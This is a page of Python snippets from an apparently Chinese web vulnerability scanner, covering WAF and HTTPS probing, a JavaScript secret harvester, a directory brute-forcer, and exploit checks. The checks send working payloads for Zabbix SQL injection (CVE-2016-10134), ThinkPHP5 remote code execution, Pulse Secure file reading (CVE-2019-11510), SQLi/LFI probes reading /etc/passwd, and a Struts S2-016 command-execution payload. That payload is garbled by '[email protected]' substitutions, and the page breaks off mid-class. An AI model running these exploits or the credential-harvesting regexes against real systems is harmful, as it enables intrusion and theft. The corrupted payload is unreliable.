Example No. 1
def verify_https(url):
    # Verify whether the domain serves http or https.
    # If the domain answers with a 301/302 redirect, get the redirected address.
    req = Requests()
    url2 = parse.urlparse(url)
    if url2.netloc:
        url = url2.netloc
    elif url2.path:
        url = url2.path
    # noinspection PyBroadException
    try:
        r = req.get('https://' + url)
        getattr(r, 'status_code')  # force an AttributeError if the wrapper returned None
        if r.status_code == 302 or r.status_code == 301:
            r = req.get('https://' + 'www.' + url)
            if r.status_code == 200:
                return 'https://' + 'www.' + url
        return 'https://' + url
    except Exception:
        # noinspection PyBroadException
        try:
            req.get('http://' + url)
            return 'http://' + url
        except Exception:
            pass
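Every example on this page relies on a project-local Requests wrapper that is never shown. A minimal stand-in, assuming it is a thin layer over requests.Session with a default timeout, certificate checks off, and redirects left to the caller so 301/302 responses can be inspected; the class internals and defaults here are guesses, not the project's real values:

import requests
import urllib3

urllib3.disable_warnings()  # the probes below routinely hit hosts with broken TLS

class Requests:
    def __init__(self, timeout=5):
        self.timeout = timeout
        self.session = requests.Session()
        self.session.headers.update({'User-Agent': 'Mozilla/5.0'})

    def get(self, url):
        # allow_redirects=False so callers can read 301/302 responses themselves
        return self.session.get(url, timeout=self.timeout,
                                verify=False, allow_redirects=False)

With a stand-in like this, verify_https('example.com') above would return 'https://example.com' on a reachable host.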
Example No. 2
def verify_https(url):
    # Verify whether the domain serves http or https.
    # If the domain answers with a 301/302 redirect, get the redirected address.
    req = Requests()
    # noinspection PyBroadException
    if '://' in url:
        try:
            req.get(url)
            return url
        except Exception:
            pass
    host = parse_host(url)
    url2 = parse.urlparse(url)
    if url2.netloc:
        url = url2.netloc
    elif url2.path:
        url = url2.path
    # noinspection PyBroadException
    try:
        r = req.get('https://' + url)
        getattr(r, 'status_code')  # force an AttributeError if the wrapper returned None
        console('Verify', host, 'https://' + url + '\n')
        return 'https://' + url
    except AttributeError:
        # noinspection PyBroadException
        try:
            req.get('http://' + url)
            console('Verify', host, 'http://' + url + '\n')
            return 'http://' + url
        except Exception:
            pass
    except Exception as e:
        logging.exception(e)
Example No. 3
def checkwaf(url):
    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text[:10000])
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text[:10000])
                if result != 'NoWAF':
                    break
        return result
    except Exception:
        return 'NoWAF'
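checkwaf leans on a module-level payload list of probe URLs and a verify(headers, body) helper, neither of which appears in these examples. A plausible minimal sketch, with made-up probe strings and an abbreviated signature table; note that the verify(vuln, ports, apps) called by the check() functions further down is a different helper:

# Probe paths that most WAFs intercept (illustrative, not the project's list)
payload = [
    "/?id=1%20AND%201=1%20UNION%20SELECT%201,2,3--",
    "/?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E",
]

# Assumed signature table: WAF name -> substring seen in headers or body
WAF_SIGNATURES = {
    'Cloudflare': 'cf-ray',
    'Safedog': 'safedog',
    'ModSecurity': 'mod_security',
}

def verify(headers, body):
    blob = (str(headers) + body).lower()
    for name, signature in WAF_SIGNATURES.items():
        if signature in blob:
            return name
    return 'NoWAF'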
Example No. 4
def verify_https(url):
    req = Requests()
    url2 = parse.urlparse(url)
    if url2.netloc:
        url = url2.netloc
    elif url2.path:
        url = url2.path
    try:
        req.get('https://' + url)
        return 'https://' + url
    except Exception:
        try:
            req.get('http://' + url)
            return 'http://' + url
        except Exception:
            pass
Example No. 5
class JsLeaks():
    def __init__(self):
        self.result = []
        self.req = Requests()

    def pool(self, urls):
        try:
            with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
                result = {executor.submit(self.get_js, i): i for i in urls}
                for future in concurrent.futures.as_completed(result, timeout=3):
                    future.result()
        except (EOFError, concurrent.futures._base.TimeoutError):
            pass
        except Exception as e:
            logging.exception(e)

        return self.result

    def verify(self, text):
        result = True
        for i in text:
            if not re.search(r'^0\d\.\d+\.\d+\.\d+|google|png$|gif$|jpg$|\b\d+\.\d+\.0\.0', i):
                result = False
                break
        return result

    def get_js(self, url):
        r = self.req.get(url)
        regex = (
            # Match URL-like endpoints
            r'\b(?:http:|https:)(?:[\w/\.]+)?(?:[a-zA-Z0-9_\-\.]{1,})\.(?:php|asp|ashx|jspx|aspx|jsp|json|action|html|txt|xml|do|js)\b',
            r'([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^\"|\']{0,}|))',
            # Match email addresses
            r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
            # Match token or password leaks,
            # e.g. token = xxxxxxxx, or "apikey" : "xssss"
            r'\b(?:secret|secret_key|token|secret_token|auth_token|access_token|username|password|aws_access_key_id|aws_secret_access_key|secretkey|authtoken|accesstoken|access-token|authkey|client_secret|bucket|extr|HEROKU_API_KEY|SF_USERNAME|PT_TOKEN|id_dsa|clientsecret|client-secret|encryption-key|pass|encryption_key|encryptionkey|secretkey|secret-key|bearer|JEKYLL_GITHUB_TOKEN|HOMEBREW_GITHUB_API_TOKEN|api_key|api_secret_key|api-key|private_key|client_key|client_id|sshkey|ssh_key|ssh-key|privatekey|DB_USERNAME|oauth_token|irc_pass|dbpasswd|xoxa-2|xoxrprivate-key|private_key|consumer_key|consumer_secret|access_token_secret|SLACK_BOT_TOKEN|slack_api_token|api_token|ConsumerKey|ConsumerSecret|SESSION_TOKEN|session_key|session_secret|slack_token|slack_secret_token|bot_access_token|passwd|api|eid|sid|qid|api_key|apikey|userid|user_id|user-id|uid|private|BDUSS|stoken|imei|imsi|nickname|appid|uname)["\s]*(?::|=|=:|=>)["\s]*[a-z0-9A-Z]{8,64}',
            # Match 32-character hex strings (MD5-style hashes)
            r'(?:[^a-fA-F\d]|\b)(?:[a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)',
            # 匹配 "/task/router" 这种路径
            r'"(/\w{3,}/\w{3,})"',
            # Match IP addresses
            r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b',
            # Match cloud storage leaks
            r'[\w]+\.cloudfront\.net',
            r'[\w\-.]+\.appspot\.com',
            r'[\w\-.]*s3[\w\-.]*\.?amazonaws\.com\/?[\w\-.]*',
            r'([\w\-.]*\.?digitaloceanspaces\.com\/?[\w\-.]*)',
            r'(storage\.cloud\.google\.com\/[\w\-.]+)',
            r'([\w\-.]*\.?storage.googleapis.com\/?[\w\-.]*)',
            # Match Chinese mobile phone numbers
            r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}',
            # Match domain names
            r'((?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+(?:biz|cc|club|cn|com|co|edu|fun|group|info|ink|kim|link|live|ltd|mobi|net|online|org|pro|pub|red|ren|shop|site|store|tech|top|tv|vip|wang|wiki|work|xin|xyz|me))'
        )
        for pattern in regex:
            text = re.findall(pattern, r.text[:100000], re.M | re.I)
            if text and self.verify(text):
                text = list(map(lambda x: url + ' Leaks: ' + x, text))
                self.result.extend(text)
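A hypothetical invocation (the URL is a placeholder): pool fans the .js URLs out over twenty worker threads and returns whatever the regexes matched:

if __name__ == '__main__':
    js_urls = ['http://example.com/static/app.js']  # placeholder input
    for leak in JsLeaks().pool(js_urls):
        print(leak)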
Example No. 6
def get_info(url):
    try:
        req = Requests()
        url = url + '/solr/'
        r = req.get(url)
        if r.status_code == 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
            return 'Apache Solr Admin leak: ' + url
    except Exception:
        pass
Example No. 7
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = r"/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
        try:
            r = req.get(url + payload)
            if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text):
                return 'CVE-2016-10134 zabbix sqli:' + url
        except Exception:
            pass
Example No. 8
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
        try:
            r = req.get(url + payload)
            if ('PHP Version' in r.text) or ('PHP Extension Build' in r.text):
                return 'thinkphp5_rce_1 | ' + url
        except Exception:
            pass
Example No. 9
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = r"/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/"
        try:
            r = req.get(url + payload)
            if 'root:x:0:0:root' in r.text:
                return 'CVE-2019-11510 Pulse Connect Secure File | ' + url
        except Exception:
            pass
Example No. 10
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        try:
            url = url + '/solr/'
            r = req.get(url)
            if r.status_code == 200 and 'Solr Admin' in r.text and 'Dashboard' in r.text:
                return 'Apache Solr Admin leak'
        except Exception:
            pass
Example No. 11
def get_info(url):
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200:
                if '<title>phpinfo()' in r.text or 'php_version' in r.text:
                    return 'phpinfo leaks: ' + url + i
    except Exception:
        pass
Example No. 12
def get_info(url):
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200 and '<html>' not in r.text:
                if not re.search(r'{"\w+":', r.text):
                    if verify(r.text):
                        return 'leaks : ' + url + i
    except Exception:
        pass
Example No. 13
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = "//www.example.com"
        try:
            r = req.get(url + payload)
            if r.is_redirect and 'www.example.com' in str(
                    r.headers.get('Location')):
                return 'Django < 2.0.8 arbitrary URL redirect vulnerability'
        except Exception:
            pass
Example No. 14
def get_info(url):
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200 and '<html' not in r.text:
                if not re.search(r'{"\w+":|<head>|<form\s|<div\s|<input\s|<html|</a>|Active connections', r.text):
                    if verify(r.text):
                        return 'leaks : ' + url + i
    except Exception:
        pass
Example No. 15
def checkwaf(url):
    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text[:10000])
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text[:10000])
                if result != 'NoWAF':
                    return result
    except UnboundLocalError:
        pass
    except Exception as e:
        logging.exception(e)
    host = parse_host(url)

    if not iscdn(host):
        return 'CDN IP'

    return 'NoWAF'
Example No. 16
class SqlLfi():
    def __init__(self):
        self.result = []
        self.req = Requests()
    
    def sqli(self, qurl):
        payload = {
            "'", "%2527", "')", " AnD 7738=8291"
        }
        LFI_payload = {'../../../../etc/passwd|root:x', '../../../../etc/group|root:x', 'random.php|Failed opening',
                       'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='}
        try:
            # The SQLi detection loop was masked ('******') in the source; a
            # plausible reconstruction, assuming a DBMS_ERRORS mapping of
            # {dbms_name: [error regexes]}:
            for i in payload:
                r = self.req.get(qurl + i)
                for dbms, regexes in DBMS_ERRORS.items():
                    if any(re.search(x, r.text) for x in regexes):
                        result = '{} SQLi:{}'.format(dbms, qurl)
                        self.result.append(result)
                        raise Getoutofloop
            for i in LFI_payload:
                url = ''
                lfi, pattern = i.split('|')
                if re.search(r'=\w+\.\w{3}$', qurl):
                    url = re.sub(r'\w+\.\w{3}$', lfi, qurl)
                elif re.search(r'=\w+', qurl):
                    url = re.sub(r'\w+$', lfi, qurl)
                r = self.req.get(url)
                if re.search(pattern, r.text, re.S):
                    self.result.append('LFI: {}'.format(url))
                    break
        except Exception:
            pass
    
    def pool(self, urls):
        host = dedup_url(urls)
        with concurrent.futures.ThreadPoolExecutor(
            max_workers=30) as executor:
            executor.map(self.sqli, host)
        return self.result
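Getoutofloop is raised above but never defined in these examples. It is presumably a sentinel exception used to escape the nested payload loops in one jump, landing in the enclosing except; a one-line sketch:

class Getoutofloop(Exception):
    pass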
Example No. 17
def robots(url):
    result = ''
    try:
        req = Requests()
        r = req.get(url + '/robots.txt')
        if r.status_code == 200 and '<html' not in r.text:
            result = re.findall(r"/[\w\?\.=/]+/?", r.text)
        if result:
            return list(set(result))
    except (UnboundLocalError, AttributeError):
        pass
    except Exception as e:
        logging.exception(e)
Example No. 18
def checkwaf(url):
    result = 'NoWAF'
    host = parse_host(url)

    if not iscdn(host):
        return 'CDN IP'

    try:
        req = Requests()
        r = req.get(url)
        result = verify(r.headers, r.text)
        if result == 'NoWAF':
            for i in payload:
                r = req.get(url + i)
                result = verify(r.headers, r.text)
                if result != 'NoWAF':
                    return result
        else:
            return result
    except (UnboundLocalError, AttributeError):
        pass
    except Exception as e:
        logging.exception(e)
    return result
Example No. 19
def get_info(url):
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200:
                if re.search(
                        r'admin|login|manager|登陆|管理|后台|type="password"|入口|admin_passwd',
                        r.text, re.S):
                    if verify(r.text):
                        return 'Admin_Page : ' + url + i
            elif r.status_code == 403:
                return 'May be the login page : ' + url + i

    except Exception:
        pass
Example No. 20
def ipinfo(host):
    out = []
    if not re.search(r'\d+\.\d+\.\d+\.\d+', host):
        req = Requests()
        try:
            r = req.get(
                'https://viewdns.info/iphistory/?domain={}'.format(host))
            result = re.findall(
                r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)', r.text,
                re.S | re.I)
            if result:
                for i in result:
                    if iscdn(i):
                        out.append(i)
        except Exception:
            pass

    return out
Example No. 22
def web_info(url):
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    req = Requests()
    # noinspection PyBroadException
    try:
        r = req.get(url)
        coding = chardet.detect(r.content).get('encoding')
        r.encoding = coding
        webinfo = WebPage(r.url, r.text, r.headers).info()
    except Exception as e:
        logging.exception(e)
        webinfo = {}
    if webinfo:
        console('Webinfo', host, 'Title: {}\n'.format(webinfo.get('title')))
        console('Webinfo', host,
                'Fingerprint: {}\n'.format(webinfo.get('apps')))
        console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
        console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
    else:
        webinfo = {}
        wafresult = 'None'
    if iscdn(host):
        osname = osdetect(host)
    else:
        osname = None

    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }

    return data, webinfo.get('apps'), webinfo.get('title')
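parse_host and parse_ip are project helpers used throughout. Minimal sketches, assuming the first strips a URL down to its bare hostname and the second resolves that hostname; the bodies are guesses that fit the call sites, not the project's code:

import socket
from urllib import parse

def parse_host(url):
    # 'http://example.com:8080/x' -> 'example.com'; bare hostnames pass through
    netloc = parse.urlparse(url).netloc or url
    return netloc.split(':')[0]

def parse_ip(host):
    # Resolve to an IPv4 address, falling back to the input on failure
    try:
        return socket.gethostbyname(host)
    except socket.error:
        return host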
Example No. 23
def web_info(url):
    host = parse_host(url)
    ipaddr = parse_ip(host)
    url = url.strip('/')
    address = geoip(ipaddr)
    wafresult = checkwaf(url)
    req = Requests()
    try:
        r = req.get(url)
        coding = chardet.detect(r.content).get('encoding')
        r.encoding = coding
        webinfo = WebPage(r.url, r.text, r.headers).info()
    except Exception:
        webinfo = {}
    if webinfo:
        console('Webinfo', host, 'Title: {}\n'.format(webinfo.get('title')))
        console('Webinfo', host, 'Fingerprint: {}\n'.format(webinfo.get('apps')))
        console('Webinfo', host, 'Server: {}\n'.format(webinfo.get('server')))
        console('Webinfo', host, 'WAF: {}\n'.format(wafresult))
    else:
        webinfo = {}
        wafresult = 'None'
    if iscdn(host):
        osname = osdetect(host)
    else:
        osname = None
    pdns = virustotal(host)
    reverseip = reverse_domain(host)
    webinfo.update({"pdns": pdns})
    webinfo.update({"reverseip": reverseip})
    data = {
        host: {
            'WAF': wafresult,
            'Ipaddr': ipaddr,
            'Address': address,
            'Webinfo': webinfo,
            'OS': osname,
        }
    }
    return data, webinfo.get('apps')
Example No. 24
class crawl():
    def __init__(self, host):
        self.links = []
        self.urls = []
        self.js = []
        self.host = host
        self.result = []
        self.req = Requests()

    def jsparse(self, r):
        html = etree.HTML(r.text)
        result = html.xpath('//script/@src')
        for i in result:
            if not re.search(
                    'jquery|bootstrap|adsbygoogle|javascript|#|vue|react|51.la',
                    i):
                if '://' not in i:
                    i = self.host + i
                self.js.append(i)

    def extr(self, body):
        # re.search returns None on no match, so guard before calling .group()
        email = re.search(
            r'[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+',
            body)
        if email:
            self.result.append('Email Leaks: {}'.format(email.group()))
        phone = re.search(
            r'(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}',
            body)
        if phone:
            self.result.append('Phone Leaks: {}'.format(phone.group()))

    def parse_html(self, host):
        try:
            exts = ['asp', 'php', 'jsp', 'do', 'aspx', 'action', 'html']
            r = self.req.get(host)
            self.jsparse(r)
            self.extr(r.text)
            tmp = html.document_fromstring(r.text)
            tmp.make_links_absolute(self.host)
            links = tmp.iterlinks()
            for i in links:
                i = i[2]
                ext = parse.urlparse(i)[2].split('.')[-1]
                if ext in exts:
                    # Links with parameters go straight into the list;
                    # those without need a second visit
                    if re.search('=', i) or re.search(r'/\?\w+=\w+', i):
                        self.links.append(i)
                    else:
                        self.urls.append(i)
        except Exception:
            pass
        return list(set(self.urls))

    def pool(self):
        result = self.parse_html(self.host)
        with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
            executor.map(self.parse_html, result)
        jslink = JsLeaks().pool(self.js)
        sql = SqlLfi().pool(self.links)
        self.result.extend(jslink)
        self.result.extend(sql)
        return self.result
Example No. 25
class crawl():
    def __init__(self, host):
        self.links = []
        self.urls = []
        self.js = []
        self.domain = ''
        self.host = host
        self.result = []
        self.req = Requests()

    def jsparse(self, r):
        try:
            html = etree.HTML(r.text)
            result = html.xpath('//script/@src')
            for i in result:
                if not re.search(
                        r'jquery|bootstrap|adsbygoogle|javascript|#|vue|react|51.la/=',
                        i):
                    if '://' not in i:
                        i = re.sub(r'^/|^\.\./', '', i)
                        i = self.host + '/' + i
                    self.js.append(i)
        except (AttributeError, ValueError):
            pass
        except Exception as e:
            logging.exception(e)

    def dedup_url(self, urls):
        urls = list(set(urls))
        result = []
        okurl = []
        for i in urls:
            urlparse = parse.urlparse(i)
            path = urlparse.path
            if path and path.split('/')[-2]:
                key = path.split('/')[-2]
                if key not in result:
                    result.append(key)
                    okurl.append(i)
            else:
                okurl.append(i)
        return okurl

    def extr(self, url, body):
        email = re.findall(
            r'\b[a-zA-Z0-9_-]+@[a-zA-Z0-9_-]+(?:\.[a-zA-Z0-9_-]+)+', body)
        if email:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Email: ' + x, email)))
        phone = re.findall(
            r'\b(?:139|138|137|136|135|134|147|150|151|152|157|158|159|178|182|183|184|187|188|198|130|131|132|155|156|166|185|186|145|175|176|133|153|177|173|180|181|189|199|170|171)[0-9]{8}\b',
            body)
        if phone:
            self.result.extend(
                list(map(lambda x: 'URL: ' + url + '  Phone: ' + x, phone)))
        ipaddr = re.findall(
            r'(?<=<!--).*((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)).*(?=-->)',
            body)
        if ipaddr:
            self.result.extend(list(map(lambda x: 'IP: ' + x, ipaddr)))
        links = re.findall(
            r'(?<=<!--).*((?:http|https):[\w\./\?=&]+)".*(?=-->)', body)
        if links:
            self.result.extend(list(map(lambda x: 'Links: ' + x, links)))
        links2 = re.findall(r'(?<=<!--).*a\shref="([\w\.\?=\&/]+)".*(?=-->)',
                            body)
        if links2:
            self.result.extend(list(map(lambda x: 'Links: ' + x, links2)))

    def parse_html(self, host):
        try:
            r = self.req.get(host)
            self.jsparse(r)
            self.extr(r.url, r.text)
            urlparse = parse.urlparse(host)
            domain = urlparse.netloc
            if not self.domain:
                self.domain = domain
            html = etree.HTML(r.text)
            result = html.xpath('//a/@href')
            for link in result:
                if not re.search('#|mail*|^/$|javascript', link):
                    if 'http' not in link:
                        if urlparse.netloc:
                            link = urlparse.scheme + '://' + urlparse.netloc + '/' + link
                        else:
                            link = 'http://' + host + '/' + link
                    if domain in link:
                        # Links with parameters go straight into the list;
                        # those without need a second visit
                        if re.search('=', link) or re.search(
                                r'/\?\w+=\w+', link):
                            self.links.append(link)
                        else:
                            self.urls.append(link)
        except (UnboundLocalError, AttributeError):
            pass
        except Exception as e:
            logging.exception(e)
        self.urls = self.dedup_url(self.urls)
        return list(set(self.urls))

    def pool(self):
        result = self.parse_html(self.host)
        with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:
            executor.map(self.parse_html, result)
        jslink = JsLeaks().pool(self.js)
        self.result.extend(jslink)
        self.links = dedup_link(self.links)
        self.links = list(map(lambda x: 'Dynamic: ' + x, self.links))
        self.result.extend(self.links)
        self.result = list(set(self.result))
        for i in self.result:
            console('Crawl', self.host, i + '\n')
        Sqldb('result').get_crawl(self.domain, self.result)
Example No. 26
class DirScan():
    def __init__(self, dbname, apps, host):
        self.notstr = ''
        self.apps = apps
        self.notlen = ''
        self.goto = ''
        self.host = host
        self.title = ''
        self.dbname = dbname
        self.outjson = []

        self.req = Requests()

    def get_urls(self, domain):
        wordlist = []
        robot = robots(domain)
        domain = domain.replace('http://', '').replace('https://',
                                                       '').rstrip('/')
        domain2 = re.sub(r'\.', '_', domain)
        domain3 = re.sub(r'^www\.', '', domain)
        ext = verify_ext(self.apps)
        ext = list(map(lambda x: '.' + x, ext))
        path = []
        for txt in glob.glob(r'data/path/*.txt'):
            with open(txt, 'r', encoding='utf-8') as f:
                for i in f.readlines():
                    path.append(i.strip())
        leaks = Cartesian()
        leaks.add_data([
            '/www',
            '/1',
            '/2016',
            '/2017',
            '/2018',
            '/2019',
            '/wwwroot',
            '/backup',
            '/index',
            '/web',
            '/test',
            '/tmp',
            '/default',
            '/temp',
            '/website',
            '/upload',
            '/bin',
            '/bbs',
            '/www1',
            '/www2',
            '/log',
            '/extra',
            '/file',
            '/qq',
            '/up',
            '/config',
            '/' + domain,
            '/userlist',
            '/dev',
            '/a',
            '/123',
            '/sysadmin',
            '/localhost',
            '/111',
            '/access',
            '/old',
            '/i',
            '/vip',
            '/index.php',
            '/global',
            '/key',
            '/webroot',
            '/out',
            '/server',
        ])
        leaks.add_data([
            '.tar.gz', '.zip', '.rar', '.sql', '.7z', '.bak', '.tar', '.txt',
            '.tgz', '.swp', '~', '.old', '.tar.bz2', '.data', '.csv'
        ])
        path.extend(leaks.build())
        index = Cartesian()
        index.add_data([
            '/1', '/l', '/info', '/index', '/admin', '/login', '/qq', '/q',
            '/search', '/install', '/default', '/cmd', '/upload', '/test',
            '/manage', '/loading', '/left', '/zzzz', '/welcome', '/ma', '/66'
        ])
        index.add_data(ext)
        path.extend(index.build())
        path.extend(wordlist)
        if robot:
            path.extend(robot)
        return list(set(path))

    def _verify(self, url, code, contype, length, goto, text, title):
        # Filter out responses that look like the recorded 404 page
        try:
            result = True
            if code in BLOCK_CODE:
                result = False
            if contype in BLOCK_CONTYPE:
                result = False
            if length == self.notlen:
                result = False
            # When the redirect matches the 404 page's redirect
            if goto == self.goto:
                result = False
            # The url appears in the redirect path
            if (url in goto) or (goto in url):
                result = False
            if url.strip('/') == self.goto or url.strip('/') == goto:
                result = False
            for i in PAGE_404:
                if i in text:
                    result = False
                    break
            if title == self.title and title != 'None':
                result = False
            # Some 302 redirects carry keywords like error or 404 in Location
            if re.search(r'forbidden|error|404', goto):
                result = False
            # The content type does not match the file extension
            if re.search(
                    r'\.bak$|\.zip$|\.rar$|\.7z$|\.old$|\.htaccess$|\.csv$|\.txt$|\.sql$|\.tar$|\.tar.gz$',
                    url) and contype == 'html':
                result = False
            return result
        except Exception:
            return False

    def parse_html(self, text):
        result = []
        soup = BeautifulSoup(text, 'html.parser')
        for i in soup.find_all(['a', 'img', 'script']):
            if i.get('src'):
                result.append(i.get('src'))
            if i.get('href'):
                result.append(i.get('href'))
        return result

    def check404(self, url):
        # Request a random page to record the 404 page's length and content
        key = str(random.random() * 100)
        random_url = base64.b64encode(key.encode('utf-8'))
        url = url + '/' + random_url.decode('utf-8') + '.html'
        try:
            self.notstr = '404page'
            r = self.req.get(url)
            if r.status_code == 200:
                coding = chardet.detect(r.content[:10000]).get('encoding')
                if coding:
                    text = r.content[:20000].decode(coding)
                    self.notstr = self.parse_html(text)
            self.notlen = r.headers.get('Content-Length')
            if not self.notlen:
                self.notlen = len(r.content)
            if r.is_redirect:
                self.goto = r.headers['Location']
        except (requests.exceptions.ConnectTimeout,
                requests.exceptions.ReadTimeout, requests.exceptions.Timeout,
                requests.exceptions.SSLError,
                requests.exceptions.ConnectionError, ssl.SSLError,
                AttributeError, ConnectionRefusedError, socket.timeout,
                urllib3.exceptions.ReadTimeoutError,
                urllib3.exceptions.ProtocolError, OpenSSL.SSL.WantReadError):
            pass

        except UnboundLocalError:
            pass

        except Exception as e:
            logging.exception(e)

    def scan(self, host):
        try:
            r = self.req.scan(host)
            if r.is_redirect:
                goto = r.headers.get('Location')
            else:
                goto = 'test'
            if r.headers.get('Content-Type'):
                contype = re.sub(r'\w+/', '',
                                 str(r.headers.get('Content-Type')))
                contype = re.sub(r';.*', '', contype)
            else:
                contype = 'None'
            rsp_len = r.headers.get('Content-Length')
            # Decide whether the response is a page or plain text;
            # for other file types coding stays unset
            ishtml = False
            if contype == 'html':
                ishtml = True
                content = r.raw.read()
            else:
                content = r.raw.read(25000)

            if ishtml:
                coding = chardet.detect(content).get('encoding')
                if coding:
                    text = content.decode(coding)
                    title = re.search('(?<=<title>).*(?=</title>)', text)
                else:
                    text = 'Other'
                    title = None

            else:
                text = 'Other'
                title = None
            if not rsp_len:
                rsp_len = len(content)

            urlresult = parse.urlparse(host)
            if self._verify(urlresult.path, r.status_code, contype, rsp_len,
                            goto, text, title):
                result = 0
                if ishtml:
                    pagemd5 = self.parse_html(text)
                    if pagemd5 == self.notstr:
                        result = 1
                if result < 0.5:
                    if title is None:
                        title = 'None'
                    else:
                        title = title.group()
                    title = re.sub(r'\n|\t', '', title)
                    console('URLS', urlresult.netloc, urlresult.path + '\n')
                    data = {
                        urlresult.netloc: {
                            "rsp_code": r.status_code,
                            "rsp_len": rsp_len,
                            "title": title,
                            "contype": contype,
                            "url": urlresult.path
                        }
                    }
                    self.outjson.append(data)
                    r.close()

        except (requests.exceptions.ConnectTimeout,
                requests.exceptions.ReadTimeout, requests.exceptions.Timeout,
                requests.exceptions.SSLError,
                requests.exceptions.ConnectionError, ssl.SSLError,
                AttributeError, ConnectionRefusedError, socket.timeout,
                urllib3.exceptions.ReadTimeoutError,
                urllib3.exceptions.ProtocolError, OpenSSL.SSL.WantReadError):
            pass

        except (UnboundLocalError, AttributeError):
            pass

        except Exception as e:
            logging.exception(host)
            logging.exception(e)

        try:
            r.close()
        except Exception:
            pass
        return 'OK'

    def save(self, urls):
        Sqldb(self.dbname).get_urls(urls)

    def run(self, task):
        try:
            with concurrent.futures.ThreadPoolExecutor(
                    max_workers=THREADS) as executor:
                futures = [executor.submit(self.scan, i) for i in task]
                for future in concurrent.futures.as_completed(futures,
                                                              timeout=3):
                    future.result()

        except (EOFError, concurrent.futures._base.TimeoutError):
            pass

    # Build and launch the scan tasks
    def pool(self):
        host = self.host.strip('/')
        self.check404(host)
        task = []
        urls = self.get_urls(host)
        random.shuffle(urls)
        for url in urls:
            task.append(host + url)
        self.run(task)
        # 保存结果
        self.save(self.outjson)
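Cartesian is the wordlist builder behind get_urls. Judging from the call pattern (two add_data calls, then build), it presumably concatenates one element from each added list, i.e. the cross product of prefixes and suffixes. A sketch of that assumption:

import itertools

class Cartesian:
    def __init__(self):
        self._lists = []

    def add_data(self, data):
        self._lists.append(list(data))

    def build(self):
        # ['/backup'] x ['.zip', '.rar'] -> ['/backup.zip', '/backup.rar']
        return [''.join(combo) for combo in itertools.product(*self._lists)]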
Example No. 27
class struts():
    def __init__(self, ip):
        self.url = ip
        self.result = []
        self.random = random.randint(100000000, 200000000)
        self.win = 'set /a ' + str(self.random)
        self.linux = 'echo ' + str(self.random)
        self.timeout = 3
        self.req = Requests()

    def st016(self):
        payload = r"/default.action?redirect:%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23f.setAccessible%28true%29%2C%23f.set%28%23_memberAccess%2Ctrue%29%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27" + self.linux + "%27%29.getInputStream%28%29%29%7D"
        try:
            r = self.req.get(self.url + payload)
            location = r.headers.get('Location', '')
            if str(self.random) in location and len(location) < 15:
                self.result.append('Apache S2-016 Vulnerability: ' + self.url)
        except Exception:
            pass

    def st032(self):
